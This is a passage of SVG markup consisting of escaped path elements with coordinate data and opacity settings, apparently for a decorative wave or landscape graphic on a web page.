d=\"M945.42,45.14a7.4,7.4,0,0,1,2.3.36c4.19,1,8.38,2,12.55,3,1.46.37,3.3.56,4.23,1.54,2.66,2.8,5.85,2.55,9.14,2.33-3.18-1.55-6.24-3.5-9.58-4.56-4.33-1.36-8.92-1.9-13.34-3-2.63-.66-5.17-1.72-7.75-2.59C942.68,44.16,943.16,45.34,945.42,45.14Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M705.23,41.47c.24,1,.49,2,.74,3,1.37.31,2.73.68,4.11.92a2.43,2.43,0,0,0,1.77-.14,2.19,2.19,0,0,0,.6-1.77C712.08,41.86,706.69,40.44,705.23,41.47Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M566.9,62.85l4.09-.37c0-.65,0-1.31.08-2l-3.93-.7Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M566.48,55.5c.88-.51,1.75-1,2.62-1.55,0-.33,0-.66,0-1l-2.67-.39h-.72l-1.25.23-.81,1.24C564,55.73,564.79,56.48,566.48,55.5Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M885.72,28.77c2.09-.33,4.87.74,5.44-2.68l-2.07-.77-3.41,3.4,0,0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M885.71,28.76l0,0h0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M885.71,28.76l0,0h0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M402,64.38a12,12,0,0,0-3.8-.12l3.72,1.19C401.88,65.09,401.91,64.73,402,64.38Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M533.65,70.75l.94,2.17,1.85-1.85-1.39-.76Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1092.16,55.67c.14-.05.18-.35.26-.54l-.57-.24c-.08.19-.27.42-.21.56A.55.55,0,0,0,1092.16,55.67Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M18.44,71.94A8.27,8.27,0,0,0,18,71c-3.4-.93-11.69-5.11-18-8v6.54C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M19.56,70.79a2.81,2.81,0,0,1,1.29-2.4c3.26-1.37,7-2,9.89-3.8,3.33-2.12,6-4.61,8.93.21.19.31,1.5-.08,2.3-.14a11.13,11.13,0,0,0-.78-2.49A13.83,13.83,0,0,0,39.1,60c2-.16,3.6.18,4.53-.44,3.66-2.47,7.56-2.39,11.66-1.88.84.11,1.77-.56,2.67-.87A66.19,66.19,0,0,0,49.7,56c-2.08,0-4.12,1.07-6.22,1.3C35,58.2,26.47,59,18,59.82L13.3,64.15l.6,1.25C15.24,67.29,17,69,18,71,19.1,71.33,19.69,71.3,19.56,70.79Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M66.23,56.25c2.09.74,3.41.14,4.79-1.32a8.11,8.11,0,0,1,2.36-1.45c1.93,2.9,4,.68,6,0,.73,4.47,3.79,5.76,8.55,3.67l-2.66-3.47c2.36-.27,4.3,0,5.56-.73,3.88-2.43,7.67-1.82,11.69-.68.89.25,2.06-.52,3.11-.82L94,49.77q-8.62,1.41-17.24,2.8a2,2,0,0,1-1-.2,5.37,5.37,0,0,0-6.17,1.43,3.11,3.11,0,0,1-2.58.66,7.68,7.68,0,0,0-7.71,2.11c1,0,2,0,3-.06C63.62,56.43,65.09,55.85,66.23,56.25Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.29,66.23l-2.42-.78c0,.48,0,1-.05,1.46a22.28,22.28,0,0,0,9,3c3.72.58,8.26.5,10.54,5,.64,1.26,2.67,1.7,3.61-.49l0,0c-2.22.08-4.06,0-2.63-3.16.4-.88.23-2.77-.39-3.2a2.09,2.09,0,0,0-.52-.25c-.41,0-.82-.12-1.22-.21-.64,0-1.32,0-1.94,0l-1.4,0-.37.27c-2.69,2.28-9.66,2-11.95-.66-.2-.22-.17-.64-.24-1a7.52,7.52,0,0,0,3.54.79,2.26,2.26,0,0,1-.21-2c.19-.78-1.11-1.93-1.73-2.91a2.57,2.57,0,0,0-.14-.61c-2.85-.2-3.59,1.14-3.81,2.86A3.89,3.89,0,0,1,404.29,66.23Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M398.39,72.46c1.45-.38,3-.49,4.64-.75l-1.86-3.45c-3,3.64-5.33,3.67-8.89.42a22.56,22.56,0,0,0-4.12-2.4C389,69.59,395.25,73.29,398.39,72.46Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1899.43,110.37a4.84,4.84,0,0,0-2.63,1.43,7.83,7.83,0,0,0,2.63-1.11Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1788.06,100.5c1.9-.27,3.93.29,5.9.52,3.39.4,6.78.86,10.17,1.23.38,0,.79-.49,1.21-.52a11.9,11.9,0,0,1,3.42,0,24,24,0,0,1,3.82,1.48c.32-.46.74-.79.8-1.17.32-2.1,1.85-2.36,3.2-1.6.59.33.8,2.25.44,3.13-.76,1.86-2.44,3.59-.39,5.47,2.55,2.34,10.5,1.49,13.12-1a5,5,0,0,1,3.69-1.39c6,1,6,1.16,8.38-4.58.12-.27.43-.45,1.08-1.11,1.41,2.23,2.65,4.31,4,6.3,1.77,2.59,2.83,2.52,4.39-.13.7-1.19,1.53-2.29,2.31-3.43l1.12.12,1.85,8.84c1.67-.23,3.16-.81,4.47-.54,2.45.51,4.64,1.26,6.68-1.11.52-.61,2.25-.65,3.22-.32,7.35,2.44,15.29,3.58,21.22,9.29a6.59,6.59,0,0,0,1.53.83c2.11-1,3.77-2.24,5.51-3l-.9-.45,1-1.4,0,0c1.17-.83,2.34-1.66,3.5-2.51.49-.36.94-.79,1.41-1.18-.47-.52-.84-1.34-1.41-1.51a7.28,7.28,0,0,0-3.42-.33v.32a7.83,7.83,0,0,1-2.63,1.11,8,8,0,0,0-1.56,2.31c0-.69-.07-1.38-.08-2.07-5,.32-10.51-2.38-14.93.57,4.42-3,10-.25,14.93-.57a21,21,0,0,0-.41-4.29,38.5,38.5,0,0,0-2.41-5.92l-.92,1.3a51.21,51.21,0,0,0-5.5-.55,2.76,2.76,0,0,0-2.16,1.12c-.33.66,0,1.7.15,2.56.22,1.54.48,3.07.72,4.6-2-.32-4-.6-6-1-.6-.12-1.12-.83-1.68-.85a8.2,8.2,0,0,1-7.45-5,8.36,8.36,0,0,0-1.19-1.93c-4.34.38-7.91.8-11.48.92-.8,0-1.6-1-2.45-1.55-2.23-1.3-4.53-2.48-6.7-3.87a11.48,11.48,0,0,1-2.06-2.26l-1.31.09-7.11,3.44c.51-1.71,1-3.16,1.39-4.61l-3.23,1c-1.26,2.74-3.89,2.28-5.58,1.44-2.47-1.24-4.46-3.43-6.66-5.22l-2.63.37c-.42.3-.85.59-1.28.88L1815,92l-1.3.24-3.86,2.42c-1.06,2.07-2.71,2.13-4.61,1.34l-2,.34c-1.4,2.37-2.54,1.9-3.54-.31l-4.15-5.71-.76-.53-1.31.27-1.31.91c-2.15,1.16-4.26,2.4-6.47,3.43-1.68.78-3.49,1.3-5.23,1.93C1782,99.51,1784.34,101,1788.06,100.5Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1705.46,85.81a4.38,4.38,0,0,1,2.31,1.83c.48.62.57,1.54,1.16,3.35l3.73-5.94c.35,2.51.61,4.36.86,6.22l.77.24c1-1.51,2-3,3.23-4.79,2.69,1.59,6.16,2.57,7.75,4.86,1.93,2.75,3.55,3.7,6.59,2.4,1.4,2.3,2.34,5.58,5.88,2.53.35-.3,1.47.34,2.24.5a8.85,8.85,0,0,0,8.53-3.59l-4-3.33-3,3h0c-.52,1.87-1.45,2.1-2.77.67l-.67-.18c-1-.54-2.47-.86-2.81-1.66-2.73-6.37-7.81-7.43-13.86-6.49-2.44.37-4.15,0-3.55-3.09a.36.36,0,0,0-.25-.27c-4-.29-7.86,2.62-12,.33-.9-.5-2.86,0-3.82.74-2.33,1.78-4.2,1.33-6.39-.17-.93-.65-2.32-.65-3.5-1-.5,1.42-1,2.84-1.79,5.11,3.6-.5,6.59-1,9.59-1.3A24.79,24.79,0,0,1,1705.46,85.81Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1616.21,78.62c2-2.87,4.61-3.18,6.76-.66,2.6,3.06,2.77,3,5.06-.82-1-.57-1.93-1.52-3-1.65-3.2-.39-6.44-.47-9.67-.68l-4.24,4.74C1613.32,81.87,1614.91,80.48,1616.21,78.62Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1609,78.85c.28.23.86.08,1.31.1-1.29-1.66-2.49-4.6-3.87-4.69-2.6-.16-5.36,1.18-7.91,2.24-.64.27-.72,1.85-1.06,2.83.69-.37,1.39-.7,2.06-1.09C1604,75.56,1605,75.63,1609,78.85Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1689.47,82.26c-2.45-1.14-4.89-2.32-7.36-3.4-.47-.2-1.11,0-1.65,0-2.38-.31-4.75-.66-7.12-1l-1.11.79,16.92,3.72C1689.25,82.37,1689.36,82.29,1689.47,82.26Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1779.28,96.53c-3-3.4-6-1.4-9,0C1772.54,98.87,1776.37,98.87,1779.28,96.53Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1594.13,82.33c1.61,0,3.09.11,2.72-2.21-1.14.14-2.4.66-3.4.36-2.12-.65-3.2,0-3.75,2C1591.18,82.43,1592.66,82.29,1594.13,82.33Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M533.93,38.55c1.78-.33,3.59-.56,5.33-1a4.91,4.91,0,0,0,2.4-1.38c2.58-3,3.41-3,5.28.44.31.57.66,1.12.52.89,5.77.28,10.93.33,16,.85,2.32.23,4.13.6,5.24-2.09a9.67,9.67,0,0,1,2.74-3.41c.48-.4,1.62,0,2.46,0,.06-1.14.11-2.28.22-4.4l-3.47,2.63c-.13-1.71-.22-3-.31-4.21l-2-2.13c-3.21.4-2.52,3-2.58,4.94-.06,2.22.13,4.84-2.28,5.46-3.08.79-6.62,1.46-9.56.67-3.29-.87-3.59-6.11-1.09-8.56.6-.59.84-1.54,1.41-2.19a3.94,3.94,0,0,1,2.84-1.43,49.65,49.65,0,0,0-1.49,6.3c-.08.67,1.28,2.2,1.62,2.1a4.61,4.61,0,0,0,2.82-1.94c.4-1-.58-2.52-.25-3.59.66-2.06,1.31-4.72,2.88-5.74,2.42-1.58,5.72-1.73,8.43-3,3.87-1.76,7.72-.72,11.6-.57h0c-.16-2.46,1.55-2.79,3.33-2.69,3,.16,6,.52,9,.8L607.9,11l2.8-1.25,1.3,0,0-1.26c-3.16.74-6.38,1.27-9.45,2.28-4.88,1.61-9.67,3.15-14.91,1.84a7,7,0,0,0-3.33.25c-8.14,2.16-16.26,4.42-24.41,6.56-3.71,1-7.51,1.62-11.2,2.67-2.72.77-5.24,2.36-8,2.84-3.36.58-4.53,2.07-4.5,5.41,0,1.23-1.49,3.42-2.49,3.54-2.88.32-3.1,2-3.37,4l3.69,1.58Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1069.52,43.37l6.19-1.24,1.31-.45,4-.58,4.89.68c4-1.88,4-1.87,5.69,2.55a30,30,0,0,0,1.2,2.79c3,5.86,3,5.82,9.09,4.29a3.72,3.72,0,0,1,2.5.41c3.12,1.85,6,3.88,4,8.29-.1.22.29.67.43,1l2.85-3c.73,1.58.37,2.94.81,4a30.58,30.58,0,0,0,3,4.62l2.47-2.29c-3.46.83-3.83.5-2.92-2.82a26.61,26.61,0,0,1,1.57-4.47c2.18-4.49.74-6.59-4.32-6.9a8.72,8.72,0,0,1-5.34-2.22c-4.86-5-4.74-5.09-9.11-.07-.12.14-.42.13-1.17.33a57.38,57.38,0,0,0-3.49-6.28,6.85,6.85,0,0,0-3.62-2.76,29,29,0,0,0-7.28-.17,55.42,55.42,0,0,0-6,.93c-2.17.37-4.32,1-6.51,1.12-3.65.3-7.51-.39-10.39,2.76a37.77,37.77,0,0,1,5.49-1.08A22.42,22.42,0,0,1,1069.52,43.37Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M617.44,10.24l4-.6c2.61,0,5.23,0,7.84,0,1.34,0,3.05.26,3.94-.43,2.59-2,4.75-1.78,6.83.48,1.62,1.76,2.72,1.95,4-.46,1.51-2.85,4.23-3.12,7.28-1.54a6,6,0,0,0,4.36.58c6.13-2.4,12.57-2.23,18.93-2.74,3.46-.56,7-1.81,10.21.74l4.74.62a15.85,15.85,0,0,1,2.84-.56c4.63-.14,9.26-.19,13.88-.27-1.36-.58-2.7-1.6-4.09-1.68C696,4,689.76,4.05,683.55,3.68c-9.12-.54-18.06,0-26.8,2.94-2.41.79-5,1-6-2.06-1.81.4-3.33.78-4.87,1.06-4.51.82-9,1.63-13.55,2.35-.83.13-1.74-.35-2.6-.31-5.24.23-10.47.54-15.7.83.25.56.5,1.13.74,1.7Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M493.05,53.3c1.63-.29,3.58,1.17,5.41,1.83l-4,3,5.83-.32c-.77-1.85-1.34-3.24-1.91-4.62-2.49-1.88-5-1.26-8-1.06-5.54.37-11.23-1.28-16.85-2.09l0-1.24L484,46.55a47.15,47.15,0,0,0-23.08,2.63,88.07,88.07,0,0,0,12.06,2.33C479.62,52.26,486.13,54.53,493.05,53.3Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M617.52,33.74l-2.9,2.16c4.85.88,4.8.88,4.91,5.68a45.67,45.67,0,0,0,.64,4.92c.26.28.53.56.79.85.41-.65,1.2-1.31,1.17-1.94-.11-2.44.58-3.63,3.32-3.92,2.18-.23,2.73-3.36,1.31-5.25C624.32,33,621,33.28,617.52,33.74Z\" transform=\"translate(0 0)\"\n opacity=\"0.6\"></path>\n <path d=\"M592,35.75c.83.74.73,2.5,1.25,4.78,1.89-.85,4.3-1.41,5.94-2.85,1-.83.64-3.09.83-4.27l3.15-3.29c-1.79,0-3.4-.16-4.42,2.16-.47,1.08-3.12,2.2-4.26,1.8-2.61-.91-4.76-1.43-7.06.56-.25.21-1.44-.91-2.25-1a7.84,7.84,0,0,0-2.46.46,45.78,45.78,0,0,0,5.58,1.79C589.46,36.1,591.3,35.16,592,35.75Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M535,51.31h4.2l4,.53,6.14.22,8.15,0c1.39-1.53,2.47-.9,3.44.5l-.07.12,2.68-.2c.05-.49.11-1,.16-1.47l-34.16-.94c.46.4.93.79,1.4,1.18Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M517.28,49.94l6.22.66,1.93.06L527.5,50l-19.06-2,1.41,1.82Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M597.32,44.41c-3.3.19-6.6.39-9.89.64-.23,0-.43.47-.64.73,2.5,2.16,7.06,1.78,11-.9C597.6,44.72,597.45,44.41,597.32,44.41Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M495.61,47.63c3.15.56,6.32,1.11,9.5,1.46.62.07,1.34-.72,2-1.11l-12.29-1.33C495.09,47,495.3,47.57,495.61,47.63Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M565,50.56c3.78-.16,7.57-.31,11.36-.5.1,0,.18-.37.28-.56C572.61,48.09,568.66,47.69,565,50.56Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1057.93,47.77c.24-1.13.47-2.26.71-3.39l-4.88,3.36,2.17.72Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M599,45.28c1.41,1,3.57.47,5.53-1.37C602.08,41.91,601,45.43,599,45.28Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1121.39,64.36l-2.2,0C1119.91,65.91,1120.64,65.94,1121.39,64.36Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M526.91,66.87l2.61.91,2.14,1.15,2,1.82,1.4-.44,2-1.44a1.48,1.48,0,0,1,.19-.57l.66-6.21a1.43,1.43,0,0,1-.16-.57l-4.71.66-1,.27-1.9,2.76c-.82-2.42-1.29-3.8-1.75-5.17l-.05-.07C524.76,61.66,526.48,64.39,526.91,66.87Z\" transform=\"translate(0 0)\"\n opacity=\"0.6\"></path>\n <path d=\"M699.28,46.12c3.9.2,5-.72,5.5-4.49l-.82-.25C701.9,42.43,699.31,43,699.28,46.12Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M637.78,32.05q-.85,2.46-1.7,4.92c1.48-2,3-1.49,4.48,0L642,34.88c0-.45,0-.9,0-1.35Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M18.44,71.94c-.93-2.4-3-4.37-4.54-6.54.79,2.21-6.73-1-13.9-4.05v8.19C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M227.49,59.55a14.62,14.62,0,0,1,5.39.15c3.79.67,7.5,2,11.3,2.29,7.86.56,15.75.58,23.63.85,1.79.06,3.59.2,5.36.43,2.28.29,4.53.71,6.79,1.08a25.57,25.57,0,0,1,3.07-.78c3.39-.47,6.81-.78,10.2-1.29,2.15-.33,2.83.77,3,2.6l1.31.32c5.86-3.59,12-2.37,18.3-1.54a78,78,0,0,1,15.47,4.16c2.66.92,6.07-.34,9.15-.61-.14-.18-.28-.52-.4-.51-5.7.44-11.06-.46-15.85-3.8-.08-.06-.22,0-.33,0-6.14-.46-12.22-1.2-17.88-3.9a4.73,4.73,0,0,0-2.35-.15c-4.42.5-8.83,1.16-13.27,1.57-3.8.35-6-1.15-7.51-4.46-.28-.61-1.05-1.43-1.54-1.4a2.21,2.21,0,0,0-1.5,1.47c-.38,1.81-.48,3.69-.76,6.12-2.94-.82-5.8-1.2-8.24-2.42-2.13-1.07-3.35-.79-5.11.57-1.29,1-3.9,2.11-4.71,1.52-2.88-2.1-5.68-1.35-8.74-1.16s-6-.46-9-.87c-1.75-.25-3.45-.88-5.2-1.13-5.63-.81-11.27-1.61-16.92-2.21-1.55-.16-3.18.41-4.77.64C219.93,58.68,223.34,60.44,227.49,59.55Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M107.68,50.62,109,50l1.34-.16h1.37l3.38.24,7.53.69c3.79-.37,7.58-.94,11.38-1,2.78-.09,5.59.74,8.37.6,4.39-.2,8.66-.6,12.82,1.52,1.39.71,3.31.41,5,.5,5.85.3,11.71.5,17.55.87,5.36.33,10.71.82,16.06,1.29,2,.17,4,.53,6,.67a12.84,12.84,0,0,0,2.58-.33c-3.2-.48-6.38-1.08-9.58-1.41-4-.42-8.2-.17-12.13-1-6.24-1.36-12.38-2.39-18.8-1.53a24.07,24.07,0,0,1-6.73-.53A4.51,4.51,0,0,1,152.65,49c-1.62-2-2.9-4.19-4.57-6.09a4.87,4.87,0,0,0-3.17-1.67c-.6,0-1.54,1.58-1.78,2.58-.85,3.6-2,4.58-5.7,3.95-3-.52-6.07-2.29-8.83.75-.3.32-1.29,0-2,0l-17.77,0c-2.55,0-5.1-.13-7.63.08s-4.86.75-7.29,1.15l11.69,1.71Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M360.25,69.74a19.45,19.45,0,0,0,14.27-2c.71-.37,1.78,0,2.68,0l6.27-.07,2.08-.58,1.19-.92,4.8-1.7c-1-1.37-1.64-3.69-3.93-1.23A12,12,0,0,1,385,64.85c-.33-1-.63-2-1-3a18.81,18.81,0,0,0-1.68-4.41,12,12,0,0,0-3.45-3.06c-1.13-.74-2.77-1.81-3.68-1.45s-1.92,2.22-2,3.47c-.16,3.27.3,6.5,4,8.14l-5.48,2.41L366,69.46l1.26-4.74c-4.21,3.49-8.38,3.43-12.54,2.69.26.7.53,1.4.79,2.09A18.31,18.31,0,0,1,360.25,69.74Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M348.81,67.74c2.05,1.76,4.37,1.82,6.69,1.76-.26-.69-.53-1.39-.79-2.09-1.83-.33-3.65-.78-5.48-1.14-.8-.15-1.81.75-2.73,1.16C347.29,67.52,348.32,67.32,348.81,67.74Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M398.14,57.66c-1.34,1.74-2.11,3.92-3.14,5.9l-.21.18.13.24,4.18-3.2,1.3-.76a16.63,16.63,0,0,0,1.42-3.64c.68-4.85,3.49-7,8.2-6.2.6.09,1.37-.88,2.06-1.36-.95-.27-1.94-.86-2.84-.74-3.33.45-5.75-.55-7.18-3.7a12.14,12.14,0,0,0-1.77-2.05c-2.86,6.11-7.58.56-11.51,2.26a21.74,21.74,0,0,0,5.76,3.5C400,50.22,401.48,53.3,398.14,57.66Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M18,59.82c-3.68-.16-5.72,1.74-4.66,4.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1345.25,39.33c.3,0,.55.88.77,1.37.58,1.23,1.13,2.47,1.69,3.7l2.78-5.82-7-6-.67.1C1342.29,35.36,1339.64,38.82,1345.25,39.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1348.71,56.82c1.07,2,1.79,1.74,3.33.61.7-.52,2.73-.57,3-.14,2.09,3.45,6.52,5.43,6.51,10.21a2.57,2.57,0,0,0,.77,1.48c4,4.4,9.59,5.64,14.78,7.72-2.36-2.43-1.84-7-6.08-8.1-.31-.08-.28-1.2-.54-1.77a4.87,4.87,0,0,0-1.22-2c-2.44-1.76-3.56-4.63-2.31-7.25.46-1,1.66-1.6,2.52-2.39a10.27,10.27,0,0,1,1.53,2.56c1.57,6.2,2.6,7.28,7.45,7.5l.09,5.57,1.23,0c.27-1.59.53-3.18,1-5.86,3.67,4.78,7.64,5.42,12,3.82.32-2.42.6-4.58.9-6.79l-2.77-.25c2.64-2.3,2.94-6.83,6.84-7.06-.26,2.92-.5,5.68-.78,8.8,1.51-.67,2.58-1.51,3-1.26,2.8,1.75,4.12.21,5.78-1.86,1.06-1.32,2.8-1.86,3.72.87.47,1.39,2.2,3.53,3,3.39a24.34,24.34,0,0,0,7.85-3c.78-.44.74-2.47.89-3.8s.12-2.9.17-4.35l-4.43-3.18-2.82,4.13c-2.88-.62-5.19-1.4-7.54-1.54s-5.25,1.11-7.38.33c-4-1.47-7.74-1.09-12.06.48a60.15,60.15,0,0,0-1.34-6.22,5,5,0,0,0-2-2.32,8.13,8.13,0,0,0-2.6-.63c-4.54-1.08-9-2-13.14,1.33a1.15,1.15,0,0,1-.59.32c-1,0-2.67.35-3-.14a5.71,5.71,0,0,1-.79-3.75,3,3,0,0,1,2.19-1.91c2.28,0,3.34-1.09,3-3.06s-1-4.09-3.92-3.47l1,2.41c-5.2,4-5.45,7-1.59,12.2a7.69,7.69,0,0,1,1.12,4.78,16.93,16.93,0,0,1-2,6.45c-.66-2.71-1.33-5.41-2.15-8.73a12.13,12.13,0,0,1-2,2.32c-.81.54-2,1.24-2.76,1-3.9-1.42-7.57-.73-11.24.69C1346.42,55.58,1348.18,55.86,1348.71,56.82ZM1375,55.71l3.17.95c1.82-1.8,2.31-3.65,1.13-6.07-.37-.74.35-2,.57-3,1,.58,2.29.94,3,1.79a45.93,45.93,0,0,1,3.11,5.31c-2.2,5.44-3.26,6.29-5.41,4.5l-3.89,2.24-2.7-4.92Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1429.65,59.51l3.06-1.52c.23,2.5-1.93,5,1.42,6.94l1.95-4.61,6.73,4.13,2.06-6c2.61,1.08,5.58,1.46,7.18,3.14,2.69,2.82,2.31,3.16,4.89.34a8.88,8.88,0,0,1,1.73-1.1c-.55,1.79-1,3.11-1.36,4.43l.72.38,3.19-1.9,2.57,3.17,3.38-4c2.19,1.56,3.36.64,4.3-1.57a3.45,3.45,0,0,1,2.45-1.77c.65,0,2,1.33,1.92,1.9-.14,1-1.18,1.76-1.85,2.62-.24.31-.52.58-.8.9,2.72,2.6,3.66-1,5.56-1.39l1.82,2.69c3.6-1.56,7.17-2.85,10.48-4.63,2.13-1.15,3.15-.7,4.45,1.1,1.48,2.05,3.51,3.51,7.27,3.65l-3.55-4.65a38.14,38.14,0,0,1,3.73,1.53c4.47,2.55,6.71,2,9.73-2.09a4.21,4.21,0,0,1,2.82-1.14,11.3,11.3,0,0,1,3,.6c1.52.3,3.49.1,4.44,1,.75.71.27,2.73.34,4.33a9.11,9.11,0,0,0,1.13-.48c4.42-2.68,5-2.61,8.87,1a3,3,0,0,0,5-1.65,28.62,28.62,0,0,0,.39-3.35c-1.18-.17-2.38-.28-3.54-.54-.94-.21-2.19-.33-2.69-1-2.81-3.64-7.42-3-11-4.73-.53-.25-1.77,1.16-2.76,1.63-1.19.56-2.6,1.53-3.68,1.29-4.88-1.06-6.15-.72-8.55,3.33l-5.16-.84c1.76-1.94,3.09-3.39,4.34-4.75-1.52-2.92-3.62-2.05-5-.87s-1.88,3.11-3,5.11c.11-3.16-.94-4.58-4.1-4.6-2.37,0-4.7-1.27-7.09-1.67a11.57,11.57,0,0,0-5,.06c-5.69,1.72-11.31,3.2-17.18.85a3.25,3.25,0,0,0-1.64-.14c-4.84.8-9.6,1-14.13-1.42a2.26,2.26,0,0,0-1.89-.12c-3.88,2.49-7.63,1.6-11.47-.11-.83-.37-2.19-.7-2.78-.29a4.61,4.61,0,0,1-5,.26c-1.55-.71-3.2-1.21-5.14-1.92-.25.81-.51,1.61-.76,2.42C1424.18,52.92,1427.59,55.41,1429.65,59.51Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1551.42,67.2c.56-1.29,1-2.54,1.61-3.69,1-1.93,4.37-2.72,5.42-1.28,2.92,4,7,4.8,11.86,4.8-.43-1.29-.75-2.21-1-3l5.34-4.25c2.54,2.71,4.76,5.31,7.28,7.57.67.61,2.35.44,3.42.14a5,5,0,0,0,1.9-1.28c1.89.52,3.92,1.38,4.11,1.08,1.62-2.56,5.43-3.51,5.47-7.21-2.48-.1-5.16-.84-7.4-.15-2.72.84-4.89.35-7.47-.28a38,38,0,0,0-9.55-.55c-2.6,0-5.18.76-7.78.85-3.25.12-6.57-.48-9.76,0-2.3.31-3.86.26-5.24-1.75a3.27,3.27,0,0,0-2.34-.91c-1.65,2.19-3.6,3.28-6.38,2.48-.1,0-.36.5-.55.77l1,6.9C1544.78,64.68,1547.93,65.4,1551.42,67.2Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1639.23,56.13l5,.11c2.64,6.34,6.6,11.29,14.84,10.85-.46,4.49,2,5.65,5.79,5.51,1.84-.07,3.7.16,5.55.25l1.69,4.38,1.21.06,1.76-.72c-.47-1-1-2-1.39-3-1.48-4-2.47-4.47-6.42-3.34a9.44,9.44,0,0,1-2.19.11c-.91-5.38-1.74-6.27-5-5.53-2.64.61-4-.91-3.32-3.67,1.13-4.46.57-5-4.39-5.07-2.74,0-5.27-.5-7-3.14-2.47-3.86-3.72-4.21-8.1-2.84l3.32,1.35Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1623.78,53.05c3.4-.23,6.83,0,10.11,0l2.21-3.28c-.78-.31-1.59-.93-2.34-.86-5,.43-10,1-15,1.55C1619.85,52.5,1621.42,53.22,1623.78,53.05Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path 